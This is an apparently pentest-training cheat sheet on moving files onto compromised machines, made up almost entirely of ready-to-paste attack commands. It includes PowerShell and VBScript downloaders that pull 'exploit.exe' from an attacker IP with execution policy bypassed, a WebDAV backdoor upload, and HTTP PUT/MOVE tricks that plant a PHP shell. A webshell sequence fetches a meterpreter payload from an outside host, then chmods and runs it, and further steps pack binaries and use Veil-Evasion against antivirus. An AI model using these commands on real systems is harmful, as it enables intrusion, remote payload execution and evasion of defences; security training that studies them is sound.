Skip to content

Latest commit

 

History

History
executable file
·
214 lines (165 loc) · 6.68 KB

File_Transfers.md

File metadata and controls

executable file
·
214 lines (165 loc) · 6.68 KB
Raw

File Transfers

  • Limit the commands on target machine to be non-interactive

TFTP Transfers

  • UDP
    • XP -2003 contained TFTP client by default
  • Not ideal
  • Mostly non-interactive

nc -nlvp 443

atftpd --daemon --port 69 /tftp

copy windows version of netcat to /tftp

Invoke tftp client on windows box.

tftp -i <IP> GET nc.exe

FTP

Windows have a default FTP client. However, the client is interactive.

  • supports scripted commands
    • ftp -s

Attacker side:

  1. Set up FTP side
  2. create a file with commands. will be automatically invoked when pasted into target host Target side:
  3. Paste commands into ftp command line

VBScript Transfers

Using VBScript

  • same concept, use echo to put commands on command line

cscript wget.vbs <URL>/local_file

Powershell Transfers

Use non-interactive commands and paste them on windows CLI

powershell-download

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://<IP>/exploit.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1

Then run powershell: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Simple Local Web Servers

Run a basic http server, great for serving up shells etc python -m SimpleHTTPServer 80

Run a basic Python3 http server, great for serving up shells etc python3 -m http.server

Run a ruby webrick basic http server ruby -r webrick -e "s = WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd); trap('INT') { s.shutdown }; s.start"

Run a basic PHP http server php -S $ip:80

Creating a wget VB Script on Windows: copy this script on a windows computer to install wget in visualbasic scripting language dont forget to start the apache2 server attack service apache2 start ####################################################### ###################################################### echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs

#################################################################### #################################################################### to use simply type cscript wget.vbs http://192.168.14.220/evidence.txt evidence.txt

Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line): echo Set args = Wscript.Arguments >> webdl.vbs timeout 1 echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs timeout 1 echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs timeout 1 echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs timeout 1 echo xHttp.Open "GET", Url, False >> webdl.vbs timeout 1 echo xHttp.Send >> webdl.vbs timeout 1 echo with bStrm >> webdl.vbs timeout 1 echo .type = 1 ' >> webdl.vbs timeout 1 echo .open >> webdl.vbs timeout 1 echo .write xHttp.responseBody >> webdl.vbs timeout 1 echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs timeout 1 echo end with >> webdl.vbs timeout 1 echo

        The file can be run using the following syntax:

C:\temp\cscript.exe webdl.vbs

Mounting File Shares

Mount NFS share to /mnt/nfs mount $ip:/vol/share /mnt/nfs

HTTP Put nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php

Uploading Files

SCP scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2 scp localfile username@$ip:/Folder/ scp Linux_Exploit_Suggester.pl [email protected]: Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor davtest -move -sendbd auto -url http://$ip https://github.com/cldrn/davtest

You can also upload a file using the PUT method with the curl command: curl -T 'leetshellz.txt' 'http://$ip'

And rename it to an executable file using the MOVE method with the curl command: curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'

Upload shell using limited php shell cmd. Use the webshell to download and execute the meterpreter [curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php [curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php

TFTP mkdir /tftp atftpd --daemon --port 69 /tftp cp /usr/share/windows-binaries/nc.exe /tftp/

EX. FROM WINDOWS HOST: C:\Users\Offsec>tftp -i $ip get nc.exe

FTP apt-get update && apt-get install pure-ftpd

#!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd offsec -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/

/etc/init.d/pure-ftpd restart

Packing Files

Ultimate Packer for eXecutables upx -9 nc.exe

exe2bat - Converts EXE to a text file that can be copied and pasted locate exe2bat wine exe2bat.exe nc.exe nc.txt

Veil - Evasion Framework https://github.com/Veil-Framework/Veil-Evasion apt-get -y install git git clone https://github.com/Veil-Framework/Veil-Evasion.git cd Veil-Evasion/ cd setup setup.sh -c